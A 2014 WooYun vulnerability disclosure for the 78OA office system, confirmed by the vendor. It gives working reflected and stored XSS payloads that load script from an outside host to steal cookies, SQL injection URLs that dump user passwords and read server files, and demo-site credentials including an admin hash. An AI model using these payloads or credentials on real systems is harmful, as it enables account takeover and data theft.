78OA办公系统漏洞小礼包(反射存储xss以及sql注射)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064785

漏洞标题：78OA办公系统漏洞小礼包(反射存储xss以及sql注射)

漏洞作者： JJ Fly

提交时间：2014-06-13 20:40

修复时间：2014-09-11 20:42

公开时间：2014-09-11 20:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-13：细节已通知厂商并且等待厂商处理中
2014-06-17：厂商已经确认，细节仅向厂商公开
2014-06-20：细节向第三方安全合作伙伴开放
2014-08-11：细节向核心白帽子及相关领域专家公开
2014-08-21：细节向普通白帽子公开
2014-08-31：细节向实习白帽子公开
2014-09-11：细节向公众公开

简要描述：

78OA办公系统漏洞小礼包(反射,存储xss,sql)

详细说明：

首先先来官网下载一个最新的版本

http://www.78oa.com/download/download42.html

官方付费版试用地址  http://v4.78oa.com  帐号test1 密码 空

这种oa系统，如果想要使用里面的功能。一般都要先有一个帐号。经过测试发现，貌似每一次安装的时候，都会生成一个随机post的key，在一些关键位置，都会提交。所以csrf作为入口的方式放弃了。
下面我们来尝试XSS(由于没有内部访问权限，只能尝试反射型xss)

http://192.168.1.117/general/file_folder/private/list/index.php?sort_id=0&sort_parent=0&folder_type=1<script src=http://t.cn/*****></script>

效果如下图

拿到一个用户的cookies之后，我们尝试拿到管理员信息。
Sql
爆所有用户的帐号密码

http://192.168.1.117/general/workflow/new/flow_graphic.php?flow_id=10049%20union%20select%203,4,USER_ID,PASSWORD,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20user#

详情可看源代码
如果此处可以解得管理员密码最好，如果不行的话，我们只能继续深入了。
官方演示站
帐号 admin
密码 0eb78ce180b2544ba047acba8e6acca6(可解密)

读取任意文件

http://192.168.1.117/general/workflow/new/flow_graphic.php?flow_id=10049%20union%20select%203,4,hex%28replace%28load_file%28char%2867,58,92,119,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,100,114,105,118,101,114,115,92,101,116,99,92,104,111,115,116,115%29%29,60,32%29%29,1,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20user#

Char(.....)代表的文件位置C:\windows\System32\drivers\etc\hosts （还可以用sqlmap进行读取）查看源码，然后把相关内容进行16进制解密
本地测试成功，体验站点测试失败。

好吧继续上面的步骤。如果不能解密管理员的md5，那样的话，我们只能尝试别的了。
在来一发存储行xss，指谁打谁。

发送邮件那选择源码输入

<SCRIPT/SRC="http://t.cn/*******"></SCRIPT>

然后发送

拿到了管理员的cookies就可以自己去给自己添加一个超级管理员了。

漏洞证明：

同上。

修复方案：

你们更专业。

版权声明：转载请注明来源 JJ Fly@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2014-06-17 22:12

厂商回复：

CNVD未直接复现，根据白帽子本地测试情况进行确认，由联系深圳市鑫星空软件有限公司0755-，需要实名转接，后发其公开邮箱，market

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064785

漏洞标题：78OA办公系统漏洞小礼包(反射存储xss以及sql注射)

相关厂商：78oa.com

漏洞作者： JJ Fly

提交时间：2014-06-13 20:40

修复时间：2014-09-11 20:42

公开时间：2014-09-11 20:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JJ Fly@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-064785

漏洞标题：78OA办公系统漏洞小礼包(反射存储xss以及sql注射)

相关厂商：78oa.com

漏洞作者： JJ Fly

提交时间：2014-06-13 20:40

修复时间：2014-09-11 20:42

公开时间：2014-09-11 20:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-064785"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JJ Fly@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：